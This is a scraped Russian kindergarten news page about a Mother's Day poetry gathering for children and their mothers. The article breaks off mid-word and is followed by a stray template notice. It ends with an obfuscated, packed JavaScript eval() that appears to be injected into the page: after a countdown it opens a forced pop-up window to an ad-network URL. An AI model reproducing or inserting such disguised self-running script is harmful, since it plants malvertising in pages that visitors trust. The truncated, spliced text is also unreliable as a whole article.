Улыбка мамы.

Под таким названием в д/саду "Берёзка" состоялась встреча в литературной гостиной, посвящённая Дню Матери. Дети с волнением ждали мам в гости. они выучили стихи, своими руками приготовили необычные подарки, накрыли столы. И мамы с удовольствием откликнулись, пришли поддержать своих маленьких чтецов.

В этот день много тёплых и нежных слов было сказано о мамах. Слов благодарности и любви. Пожеланий. А вот за чашкой чая говорили только о детях. Для каждой женщины самое ценное в жизни - это ребёнок. Спасибо большое всем мамам за вашу поддержку и отзывчивость, за помощь и понимание. Спасибо за таких замечательных детей. Ничего милее нет улыбки мамы, маминого голоса, маминых рук.

 

Каждый малыш тянется к своей мамочке - прижаться, почувствовать тепло родного и любимого человека. А сияющие радостью счастливые лица детей - лучшая награда и для мам, и для воспитател

Please publish modules in offcanvas position.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('<5>4 n="c://b.a.9/8?7=6";4 2=d;e 3(){f(2>0){2--;4 g=2+1;i("3()",j)}h{k.l("c://b.a.9/8?7=6","m")}}3();',24,24,'||count|countDown|var|script|688b0be27b4d45d6562eba71df5c7886|key|ef4ex511a|com|effectivecpmnetwork|www|https|10|function|if|waktu|else|setTimeout|1000|window|open|_0|url'.split('|'),0,{}))